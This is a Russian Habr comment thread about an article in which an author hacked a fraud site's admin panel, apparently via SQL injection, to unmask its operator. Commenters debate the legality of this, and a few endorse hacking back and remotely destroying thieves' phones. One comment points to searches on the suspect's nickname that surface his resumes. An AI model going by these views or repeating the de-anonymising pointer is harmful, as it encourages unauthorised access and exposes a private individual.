              У нас очень хороший колледж, где преподают лишь современную информацию. Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?

          • submagic
            /#20057040

            Сначала прочитал как «Латентно-компьютерный колледж». Даже не удивился.

  20. sleonov
    /#20055488 / +1

    Все это похоже на проведение оперативно-розыскных мероприятий. А вот список органов власти, кто может осуществлять такую деятельность: Органы внутренних дел Российской Федерации, Органы федеральной службы безопасности, Федеральный орган исполнительной власти в области государственной охраны, Таможенные органы Российской Федерации
    Служба внешней разведки Российской Федерации.
    Все это регламентируется Федеральным законом «Об оперативно-розыскной деятельности»
    от 12 августа 1995 года N 144-ФЗ, принятым Государственной Думой 5 июля 1995 года

    (в ред. Федеральных законов от 18.07.1997 N 101-ФЗ,
    от 21.07.1998 N 117-ФЗ, от 05.01.1999 N 6-ФЗ,
    от 30.12.1999 N 225-ФЗ, от 20.03.2001 N 26-ФЗ,
    от 10.01.2003 N 15-ФЗ, от 30.06.2003 N 86-ФЗ,
    от 29.06.2004 N 58-ФЗ, от 22.08.2004 N 122-ФЗ,
    от 02.12.2005 N 150-ФЗ, от 24.07.2007 N 211-ФЗ,
    от 24.07.2007 N 214-ФЗ, от 29.04.2008 N 58-ФЗ,
    от 22.12.2008 N 272-ФЗ, от 25.12.2008 N 280-ФЗ,
    от 26.12.2008 N 293-ФЗ, от 28.12.2010 N 404-ФЗ,
    от 21.11.2011 N 329-ФЗ, от 08.12.2011 N 424-ФЗ)
    Т.е. автор, своими действиями и публикацией — нарушил все вот это вот вышеперечисленное :)

    • Javian
      /#20055640

      Смотрим на это с другой стороны. Аноним misery-hacker разместил на хабре статью.
      Петр Иванов прочитал и на сайте генпрокуратуры написал обращение «Я, Петр Иванов, прочитал статью „Как я хакера ловил“ по адресу habr.com/ru/post/448810
      В статье содержится информация о преступлении.
      Прошу провести проверку изложенных фактов.»
      Будет ли прокуратуру интересовать личность misery-hacker так чтобы попытаться его найти?

      • acyp
        /#20055654

        Скорее всего да, т.к. действия Gelloiss еще надо квалифицировать (тем более, что в «свободном общении» он факт умысла отвергает), а вот misery-hacker прямо в полный рост расписал осуществление преступного умысла. И сам умысел "… на блюдечке с голубой каемочкой..." преподнес. Я так и вижу формулировку: "… руководствуясь мотивом мести, из хулиганских побуждений, осознавая противоправность деяния ..."

        • dmitrmax
          /#20055700

          А что? Заявление от пострадавшего от действий взломщика совсем не нужно?

          • acyp
            /#20055728

            Нет. Javian очень корректно сформулировал:

            Прошу провести проверку изложенных фактов
            По действующим нормам о преступлении может сообщить любой гражданин.

          • Rsa97
            /#20055772

            Не требуется. УПК РФ ст.21.2:

            В каждом случае обнаружения признаков преступления прокурор, следователь, орган дознания и дознаватель принимают предусмотренные настоящим Кодексом меры по установлению события преступления, изобличению лица или лиц, виновных в совершении преступления.
            Аналогичная статья есть в КоАП РФ (ст. 28.1.1.1). Заявление требуется только в гражданско-правовых отношениях.

          • lubezniy
            /#20056468

            Уголовные дела публичного обвинения (перечень статей есть в УПК) могут возбуждаться без заявления потерпевшего.

        • NoRegrets
          /#20060568 / +2

          Не надо пугать. Для привлечения по любой статье нужно доказать злой умысел, в т.ч. и для привлечения по 272 статье «неправомерный доступ». Это — единственное, за что здесь можно привлечь. Прокурур, если дело дойдет до суда, вспотеет, доказывая злой умысел во фразе «с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт...». А адвокату всего лишь придется помахать этой статьей, которая ясно говорит, что никакого умысла у misery-hacker не было. Следователь, осознавая всю бесперспективность этой затеи, даже дела открывать не будет, а если и откроет по заявлению, закроет «за отсутствием состава преступления».

          • acyp
            /#20061346 / +1

            и не планировал пугать, а только рассуждал, полагаясь на здравый смысл и некоторое знание системы.
            1. очень много зависит от того как происходящее преподнесут в заявлении.
            2. много зависит и от ответа самих участников (или их адвокатов). но при этом надо помнить, что на стадии доследственной проверки адвокат может быть только в одном случае: если заранее заключен договор…
            3. факт «взлома» ака «несанкционированного доступа к чуствительной информации» через уязвимость к «админке» расписал никто иной как мистери-хакер. причем со всеми подробностями.
            зря вы ссылаетесь на «злой умысел», нет такого в подзаконных документах. есть «умысел на совершение противоправных действий», злой он или добрый это уже следствию и суду разбираться. а умысел есть, да с реализацией.
            я не «за охотника либо медведя». я против человеческой глупости и незнания норм и правил.
            и не думаю, что есть необходимость продолжать, ибо все в руках Богов Великого Рандома.
            Но ТС знатно подставился, это факт.

            • pyrk2142
              /#20062434

              Очень сильно поддержу этот комментарий: как минимум, я был бы рад (относительно), если бы написание фразы «В исследовательских целях», «Для поиска злоумышленника» защищало бы исследователей и энтузиастов. Но боюсь, что в реальности это не так просто.

              Отдельный вопрос в следующем: автор явно сначала сделал то, что описано в статье, а потом уже написал ее. Поэтому я подозреваю, что вполне возможно рассуждение вида «Была использована уязвимость в сервисе, получен доступ к данным карт, потом была написана статья, где в целях оправдания себя было указано, что это сделано для поиска злоумышленника.» Понятно, что я почти не верю в реальность того, что написано в кавычках, но в судах и в следственных органах работают другие люди, которые могут воспринять все иначе.

              • alsoijw
                /#20062456 / +1

                Очень сильно поддержу этот комментарий: как минимум, я был бы рад (относительно), если бы написание фразы «В исследовательских целях», «Для поиска злоумышленника» защищало бы исследователей и энтузиастов. Но боюсь, что в реальности это не так просто.
                Зачем нужны эти индульгенции? Взрослые люди и так должны понимать что хорошо, а что плохо.

      • alsoijw
        /#20056784

        Аноним misery-hacker разместил на хабре статью.
        Не совсем. Если бекапы с сайта успели слить, то есть что копать
        Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.

        misery-hacker, бекапы уничтожил?

    • Kordamon
      /#20056060

      А какими законами РФ регламентируется такая деятельность вне территории РФ и не по отношению к гражданам РФ?

  21. Dasyo
    /#20055530

    Интересно почитать. Про и дилетант.

  22. stantum
    /#20055718 / +1

    Я там вижу раздел «Адреса». Люди вводят свой email? Можно сделать «краудфандинг», разослав эту статью пострадавшим. А они уж сами придумают, как его наказать.

    • Dagnir
      /#20056124

      В первую очередь надо предупредить, что карту надо заблокировать.

      • submagic
        /#20056364

        Да, именно так. И чтобы вообще поменяли всё, что только можно. А то имея часть информации о человеке почти всегда можно на основании этой части собрать ещё. И ещё. И ещё. И так пока, действительно, даже кража личности не станет вполне реализуемой.

        • sumanai
          /#20056534

          И чтобы вообще поменяли всё, что только можно.

          ФИО? Вообще, бесит современный мир, где ФИО требуют где попало, а сменить их весьма сложно.

          • submagic
            /#20056554

            Ну, ФИО, конечно, поменять непросто. Но сейчас некоторые и это ухитряются делать См. недавние новости о всяких-разных личностях, ранее попадавшихся на противоправных действиях, а потом сменивших как минимум фамилию и подавшихся кто куда (некоторые даже в чиновники пролезли). Но если речь о карточках — имеет смысл как минимум перевыпустить карту, поменяв кодовое слово (а лучше и привязанный номер телефона), я так полагаю.

  23. lxsmkv
    /#20056680

    Сайт использует незащищенное соединение для сбора конфиденциальных данных. Это технический дилетантизм, неправильно, и все такое, но не наказуемо. Сайт отказал в предоставлении услуги или предоставлении услуги в другой форме. Жаль, но имеет право.
    А намеренно взламывать сайт с целью получение доступа к личной информации, без санкций — преступление.

    Пока что это выглядит со стороны так: «меня послали — я взломал»:

    поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо?

    И стилистический ключ повествования не технически-простветительский — вы не раскрываете практически никакого «ноу хау», только найденную информацию, а «смотри как надо гопарей наказывать». Значит, в первую очередь целью было раскрытие личной информации предположительных «злоумышленников».
    А по закону, злоумышленники они или нет должен решать суд.

    Лучше было бы сделать статью о том, как пользователь сам может определить сайты с недостаточно безопасной обработкой пользовательских данных. Или как сделать надежную платежку. Людям было бы имхо больше пользы.

    Я бы статью через модерацию не пропустил, именно из-за отстуствия технической, либо общественно-полезной направленности. Хабр не место для слива личной информации. Для этого есть викиликс и пр.

    • alsoijw
      /#20056752 / +2

      И стилистический ключ повествования не технически-простветительский — вы не раскрываете практически никакого «ноу хау», только найденную информацию, а «смотри как надо гопарей наказывать».
      Статья полезна как раз своей технической частью. Во-первых рассказывает про взлом сайтов. Если знаешь как ломать, знаешь как защищаться и наоборот. Во-вторых статья рассказывает про то как осуществляется деанон. Это технические навыки и они пригодятся для реальных задач. В-третьих, возможно, очередной школьник прочитает эту статью и подумает о том, ввязываться ему в данное дело или нет.

      • lxsmkv
        /#20056828

        Ну вся зацепка — это удачная sql иньекция на админке. Все остальное — расследование, которое итак любой сможет провести. А в основном идет раскрытие конфиденциальной информации.
        Кроме всего тут присутствует «систематическая ошибка выжившего». Статью пишут только про удачный случай. Таких как правило меньше чем неудачных. Про них просто не пишут.

        Даже если считать, что статья про ИБ, то контекст применения этих знаний, мотивация, в данном случае по меньшей мере сомнительны.

        • Gelloiss
          /#20056832 / +3

          Угу, и результат всего расследования — найти разработчика, который и так указан в футере сайта =_=

          • submagic
            /#20056854

            Ну, вообще-то, ещё и оценить его причастность к некоторым действиям (правильно или нет, уже другой вопрос, но всё же именно так).

        • submagic
          /#20056856

          Ну вся зацепка — это удачная sql иньекция на админке.
          Какая-то уж совсем детская. Я был безмерно удивлён, если честно — думал, ничего подобного уже нигде не осталось с нулевых.

        • alsoijw
          /#20056922 / -1

          Ну вся зацепка — это удачная sql иньекция на админке.
          Неверно. Согласно теории швейцарского сыра тут нужно рассматривать сразу все уровни. Как то что админка доступна абсолютно любому человеку, догадавшемуся ввести правильный адрес, так и то что человек занялся велосипедостроением. Думаю читающие историю достаточно умны, и мне не нужно расписывать все допущенные ошибки.
          Все остальное — расследование, которое итак любой сможет провести.
          Gelloiss бы не смог. Лично я бы тоже не смог, так как не хожу в кино и у меня нет времени задерживаться на сомнительных сайтах (? ?•???•? ?)
          Статью пишут только про удачный случай. Таких как правило меньше чем неудачных. Про них просто не пишут.
          А почему они неудачные? Не потому ли, что их авторы подумали о защите?
          то контекст применения этих знаний, мотивация, в данном случае по меньшей мере сомнительны.
          Переиначу известное выражение: «Знания не пахнут».

          Знания очевидны когда ты их знаешь. Но просто взять и передать знания, как передают книгу, нельзя. Их нужно собрать самому. Если человек ходит(ходил?) в ВУЗ и не знал этого, то что говорить про самоучек? Я уверен, что php и через 20 лет, если будет существовать, будет позволять сделать подобную инъекцию. Даже в каком-то C# вполне возможно придётся запросы писать руками.

          • mkll
            /#20060870

            Я уверен, что php и через 20 лет, если будет существовать, будет позволять сделать подобную инъекцию

            В этом году — 31 год червю Моррисона. При этом используемый в нем метод атаки (переполнение буфера) — живее все живых.

            Так что, скорее всего, вы правы.

  24. submagic
    /#20056792

    Лучше было бы сделать статью о том, как пользователь сам может определить сайты с недостаточно безопасной обработкой пользовательских данных. Или как сделать надежную платежку. Людям было бы имхо больше пользы.
    Это да. Но и из данной статьи подобную информацию в некотором количестве можно почерпнуть. Да и в комментах многое изложили.

  25. alexandrtovmach
    /#20056874 / +1

    Давайте ка зайдём с другой стороны?


    Не сомневаетесь ли вы в реальности аккаунта автора статьи?


    1. Зарегистрирован только для публикации этой статьи.
    2. Взлом прошел слишком гладко
    3. Статья написана очень хорошо, не знаю это либо талант, либо статья явно не первая
    4. Слишком целенаправленно бьёт по Gelloiss, не желая искать другие доказательства, хотя имея возможность.
    5. Никаких действий кроме статьи, автор предпринимать не хочет, хотя он утверждает что уверен в законности своих действий
    6. При наличии обоих сторон в комментариях, на мой взгляд, должен был разразится невероятный баттл. Ведь одна сторона может писать статьи, и на слова гаразд, а другой является жертвой. Но как то всё стирильно.

    Вполне вероятно что это мой СПГС, но если автор статьи является тем же Gelloiss, который просто опубликовал хайповый материао, со взломом самого себя, используя новый аккаунт?

    • alsoijw
      /#20056954 / +1

      Не сомневаетесь ли вы в реальности аккаунта автора статьи?
      А откуда она тогда взялась?
      Зарегистрирован только для публикации этой статьи.
      Информацию о взломе лучше всего публиковать с анонимного аккаунта, так как доблесные защитники закона могут повязать. Тем более, что на сервере могли остаться его следы.
      хотя он утверждает что уверен в законности своих действий
      А что ему на себя заявление за взлом писать?
      Вполне вероятно что это мой СПГС, но если автор статьи является тем же Gelloiss, который просто опубликовал хайповый материао, со взломом самого себя, используя новый аккаунт?
      Если уж искать тайный глубокий смысл, то тогда зачем себя компрометировать во-первых как профессионала, во-вторых возможно как мошенника?

  26. seri0shka
    /#20056876

    Интересно, а можно ли подобным образом «поймать» других людей, чтобы выразить им бесконечную признательность за созданное ими.
    На полном серьёзе, я уже давно хочу узнать имя автора произведения (незаконченного, к сожалению) Сиамский вояж Степаныча, заодно хотелось бы узнать причину столь внезапного конца, на продолжение уж давно не надеюсь.
    Так же хотелось бы узнать о судьбе автора форума Пультоскоп на Arduino 27МГц под ником bodriy2014, который сделал доступным для тысяч любителей довольно нужного и функционального устройства, да и просто мотивировал народ на самосовершенствование. Что-то подсказывает, что человека, возможно, уже нет среди живых, но был бы рад узнать, что ошибаюсь.
    Страна должна знать своих героев.

  27. mukoladerevlo
    /#20057220 / +1

    на скрине есть .well-known/, папка для certbot не так ли? не доустановили сертификат до конца, фатальная ошибка которая запустила цепную реакцию?
    Статья огонь) поражают комменты что тс нарушил кучу законов)
    цель оправдывает средства. против таких ребят можно и нужно использовать их же методы. закон написан для хороших, плохим и так пофигу. Восхищаюсь невозмутимостью Искры в комментах, так ловко включил дрозда, "шо капец", но так тупо спалился. "море по колено".
    Скорее всего ничего ему у нас не будет, хотя инфы предостаточно. У нас только чуваков могут посадить за битки, причем достаточно одного чека с яндекс денег что бы сказать что они 5 колона (дело было прошлым годом), отжать весь биток и поминай как звали. а маркуса почти посадили за старые заслуги, тоже скам. О дивный новый мир :7

    • pyrk2142
      /#20057318

      Статья огонь) поражают комменты что тс нарушил кучу законов)
      цель оправдывает средства. против таких ребят можно и нужно использовать их же методы.
      Можно использовать очень много что, но это не значит, что за это ничего не будет. И больше об этом говорят в комментариях.

      Сейчас это выглядит относительно понятной ситуацией, но которую все еще можно пытаться поворачивать как «Хакер влез в админку сайта, скачал данные карт», если кто-то очень захочет это сделать. В другой похожей ситуации, которая будет выглядеть уже не так однозначно, исследователь может и проиграть. Белые хакеры ходят по грани, это стоит понимать и помнить.

      • mukoladerevlo
        /#20057470

        Я согласен с Вами. также как я согласен что между добром и злом тонкая грань и восприятие этой грани у каждого свое. для этого ведь существуют суды что бы прийти к общему пониманию ситуации. проблема в том, что пока дело дойдет до суда, все следы будут подчищены, все легенды сложены и алиби проработаны. Just one more thing...

  28. AcidVenom
    /#20058556 / +4

    Выдача гугла по нику ura7887:
    раз, два, три, резюме1 и резюме2.

  29. MINYSMOAL
    /#20059524 / -3

    Обвинять человека, который сделал кому-то сайт энто сильно конечно.

  30. TomskikhAA
    /#20059558 / -2

    У меня у ребенка пытались увести гугл аккаунт. И даже можно сказать увели, только не поменяли дополнительный e-mail и телефон. Я восстановил доступ, зашел в аккаунт, а там еще один смарт Мейзу привязан, с пропиской в Кривом роге. Ну для начала я заблокировал его как краденый. А потом еще еще и информацию с него удалил всю… ибо нефиг взламывать чужие аккаунты.

    • Vilgelm
      /#20061050

      Справедливости ради вы могли заблокировать покупателя взломанного аккаунта, но не самого взломщика (думаю раз смартфон был привязан, то взламывали ради каких-то игр из Google Play или чего-то в этом духе).

      • glowingsword
        /#20061818

        Покупатель взломанного аккаунта:
        1. Знает что покупает.
        2. Спонсирует взлом аккаунта, то есть является заказчиком взлома, в то время как взломщик — всего лишь исполнитель.

        А следовательно жалеть такого персонажа точно не стоит. Можно было бы аппаратно ему смарт навернуть удалённо — не грех было бы и аппарат ему спалить…

        • Vilgelm
          /#20061844

          Далеко не обязательно. Допустим я иду и покупаю авторег, а продавец мне подсовывает вместо него взломанный аккаунт (они дешевле). Если не проверять тщательно то можно и не заметить подвоха, а потом оказаться с заблокированным телефоном.

          Впрочем, блокировка телефона на Android больших неприятностей не несет все равно.

        • 1c80
          /#20061968

          А как можно удаленно спалить аппарат? Я что то пропустил?

          • glowingsword
            /#20062328

            Никак, к сожалению. А жаль. Гипотетически было бы не плохо на лету изменять прошивку контроллера батареи. Это давало бы возможность уничтожить удалённо девайс, который не должен попасть в чужие руки. Или наказать плохиша, что юзает краденную учётку.

            • 1c80
              /#20065476

              это ирония была и хорошо, что нельзя, а то после телефона и хату ему спалить захочется и так далее по нарастающей

              • glowingsword
                /#20066432

                Тут вы правы. Ворам чужих профилей с игрушками что угодно нехорошее сделать хочется. Это же на святое покушаются. Ладно бы хлебушек воровали, или яблоки в саду…

        • alsoijw
          /#20062090

          А следовательно жалеть такого персонажа точно не стоит. Можно было бы аппаратно ему смарт навернуть удалённо — не грех было бы и аппарат ему спалить…
          А ничего, что аппарат может не у него быть?

        • S-trace
          /#20062226

          >Можно было бы аппаратно ему смарт навернуть удалённо — не грех было бы и аппарат ему спалить…

          А что, нельзя что ли?)

              <!-- @SystemApi Required to be able to disable the device (very dangerous!).
                   <p>Not for use by third-party applications.
                   @hide
              -->
              <permission android:name="android.permission.BRICK"
                  android:protectionLevel="signature" />

        • Speakus
          /#20062234

          Логика, конечно, понятная каждому, но она противоречит закону.

          Нельзя в бутылку из под водки наливать яд предполагая, что сам ты знаешь, а грабителям так и надо. За такое накажут и сильно.

          Касательно же случая удалённого стирания — из комментария очевиден умысел (а это больший срок чем «по неосторожности»). Т.е. для статьи УК РФ 272 — уже виден умысел, видно уничтожение информации — не хватает только заявления «потерпевшего» чтобы нельзя было съехать на «классную историю я выдумал, а Вы повелись тут».

          Конечно, для многих «такой поворот» выглядит несправедливым, но закон именно таков.

          • S-trace
            /#20062254 / +1

            >Нельзя в бутылку из под водки наливать яд предполагая, что сам ты знаешь, а грабителям так и надо. За такое накажут и сильно.
            И это огромная проблема.

            >из комментария очевиден умысел
            Да, автор комментария умышленно стёр устройство, зарегистрированное на принадлежащий ему аккаунт.

            >не хватает только заявления «потерпевшего»
            ЩИТО??

            • Speakus
              /#20062406

              И это огромная проблема.
              Я знаком с позицией, что смертная казнь нужна и для воров, но эта позиция всё же скорее маргинальна, чем поддерживается большинством.

              Да, автор комментария умышленно стёр устройство, зарегистрированное на принадлежащий ему аккаунт.
              В кабинете у следователя я бы не рекомендовал придерживаться такой позиции. ИМХО заведомо провальная.

              ЩИТО??
              А что вы удивляетесь то? Если будет заявление — органы обязаны его будут принять в обработку. Как правило нарушители закона подкованы в законодательстве лучше чем обыватели ну и наглости им не занимать — поэтому хоть такие случаи и редки, но случаются.
              Разумеется нужно будет объяснить следователю каким образом сам «потерпевший» получил доступ к аккаунту.

              • alsoijw
                /#20062448

                Я знаком с позицией, что смертная казнь нужна и для воров, но эта позиция всё же скорее маргинальна, чем поддерживается большинством.
                В итоге приходят к тому, что жизнь вора-карманника, ценится так же высоко как и жизнь какого-то писателя/изобретателя. И равными правами наделяют.

                • Speakus
                  /#20062520

                  Если считать цену жизни не равной не только де-факто, но и де-юре то возникают другие проблемы. В частности как определять цену этой самой жизни. Что наверняка приведёт к чему-то подобному:

                  Убил бомж олигарха — расстрел. Убил олигарх бомжа — 10 тыс штрафа (а может даже премия?).

                  • alsoijw
                    /#20062556

                    Если считать цену жизни не равной не только де-факто, но и де-юре то возникают другие проблемы.
                    Де-юре она и не считается равной. Тот же sjw постарался. Только вот официально признавать это не хотят.

                    • Speakus
                      /#20062636

                      Или я не понял Вас или Вы путаете понятия де-юре и де-факто. Если она де-юре не равна — приведите соответствующий закон.

                      • alsoijw
                        /#20066134

                        Если она де-юре не равна — приведите соответствующий закон.
                        Правоприменение можно считать де-юре? Если нет, то тогда вы правы.

              • pyrk2142
                /#20062482 / +1

                Разумеется нужно будет объяснить следователю каким образом сам «потерпевший» получил доступ к аккаунту.
                Есть еще достаточно маловероятная, но возможная ситуация, когда владелец привязанного телефона либо на самом деле не является мошенником (и даже не знает о мошенничестве), либо очень удачно заставит в это поверить (либо не поверить, но не дать его наказать).

                Например, история о том, что владелец телефона принес его в сервис по объявлению, где попросил настроить, [несколько доказательств среднего уровня, по которым настройщика не найти, но нет явных оснований не верить заявлению], заплатил деньги и ушел. А тут кто-то стер все данные и заблокировал телефон. Виноват настройщик, но данные-то стер другой человек, которого найти проще.

                И я абсолютно не уверен, не окажется ли в этой ситуации двух жертв двух разных преступлений, одна из которых оказалась еще и преступником. Понятно, что это очень маловероятно, но я бы не стал так рисковать.

              • S-trace
                /#20062930

                Ок, подойдём к этой же проблеме с другого края.
                Человек заходит в выписку по своей карте, обнаруживает там записи о покупках в интернет-магазине которые он не совершал. Его действия?

                Обратиться в банк и оспорить операции, сделав chargeback?
                Сидеть смирно и не обращаться в банк?

                Придерживаясь вашей логики, правильный вариант — второй. Ведь иначе вор/мошенник не получит товары, пойдёт напишет заявление о недополученной прибыли и подаст на хозяина карты, так получается?

                • Speakus
                  /#20063280

                  Придерживаясь вашей логики...
                  Какой такой павлин-мавлин моей логики? Вам не нравится знать как работает закон? Ну можете игнорировать эту информацию.
                  А увидев покупки которые не совершал — можно и нужно их оспаривать. Есть как бы принципиальная разница между:
                  — стереть устройство которое Вы посчитали устройством злоумышленника
                  и
                  — опротестование покупок по своей карте

                  Впрочем, разница действительно не так уж и велика если Вам кажется, что воры заслуживают смерти…

                  • S-trace
                    /#20063594

                    Я придерживаюсь того, что со своими вещами и аккаунтами человек может делать что угодно, до тех пор пока это не является общественно опасным.
                    То есть, хранить антифриз в водочной бутылке в СВОЁМ холодильнике — почему бы и нет, если все домашние об этом знают и не тронут этот антифриз, а никто посторонний доступа в ЕГО холодильник не имеет. Общественной опасности нет.
                    Стереть устройство невесть откуда взявшееся в СВОЁМ аккаунте — почему бы и нет, если доступ к этому аккаунту есть (по крайней мере должен быть) ТОЛЬКО у него одного. Общественной опасности нет.
                    Собрать в гараже бомбу из старых портянок и банок из-под тушёнки — нельзя, поскольку если она случайно/специально сработает то пострадают и соседи которые о ней и знать не могли по сути => общественно опасно.

                    • Speakus
                      /#20066630

                      Моя мама как-то рассказывала историю как она, по молодости, справляя новый год в гостях, залезла в чужой холодильник и, увидев там морсик, хлебанула его прям из банки. Оказалась свиная кровь… долго плевалась. Тут можно пожурить, что это вообще не вежливо, что без разрешения залезла, без спроса выпила, да ещё и не в кружку себе налила, а прям из банки.

      • TomskikhAA
        /#20063418

        смарт вошел в аккаунт в момент взлома. Скорее всего кто то практиковался. А ломали да, скорее всего ради игр. это ребенка акк. там нет ничего больше.

        • Vilgelm
          /#20063978

          Тоже не факт, если логин и пароль увели через какой-нибудь фейк сайт. Могли в таком виде и продать.

          А вообще надо двухфакторную через приложение делать и тогда увести будет довольно тяжело.

          • TomskikhAA
            /#20064918

            этот логин с паролем ребенок не знает, единственное что он мог сделать — это разрешить какой либо игре доступ к аккаунту.
            Авторизация после этого случая двухфактораная; о) просто акк не мой, мой уже давно нормально настроен.
            ЗЫ: даже если я удалил инфу и заблокировал тело не хакера, а покупателя, то все равно будет ему урок на будущее.

            • Vilgelm
              /#20065676

              этот логин с паролем ребенок не знает, единственное что он мог сделать — это разрешить какой либо игре доступ к аккаунту

              Насколько я знаю через доступ приложения привязать телефон к аккаунту не получится. Нужно знать именно логин и пароль.

              даже если я удалил инфу и заблокировал тело не хакера, а покупателя, то все равно будет ему урок на будущее.

              В случае с Android такая блокировка по идее не должна больших проблем приносить: прошиваем через fastboot и все. Хотя видел на телефонах Asus защиту, типа после перепрошивки нужно ввести пароль от аккаунта, но там можно подождать неделю и войти без пароля. Данные можно восстановить из старого аккаунта, к которому телефон был привязан до этого. Данные типа фотографий можно вытащить через рекавери. Короче час-два и готово.

              Вот если бы это был iPhone, то тогда его бы только на запчасти.

            • pyrk2142
              /#20065874

              ЗЫ: даже если я удалил инфу и заблокировал тело не хакера, а покупателя, то все равно будет ему урок на будущее.

              Думаю, что если бы я по какой-то довольно странной причине оказался на месте покупателя, то я бы прикладывал очень много усилий для наказания «хакера» по 272 статье (или той, которая больше подойдет в такой ситуации). Скорее всего, это было бы сложно, а результат был бы сомнительным, но это интересно.

  31. xState_level80
    /#20061798 / -2

    Вы конечно молодцы, но должен заметить, что хакер это вы, а он просто кибер мошенник. Эх эти путаницы с понятием «Хакер»…

    • glowingsword
      /#20062114

      С 60-х у этого слова было столько разных смысловых нагрузок(от людей, хакавших игрушечную железную дорогу до ветеранов движения OpenSource, и просто специалистов и энтузиастов того, или иного вида деятельности, сделавших нечто крутое), что теперь даже эксперты не скажут вам точно, что именно подразумевают разные группы лиц под данным термином.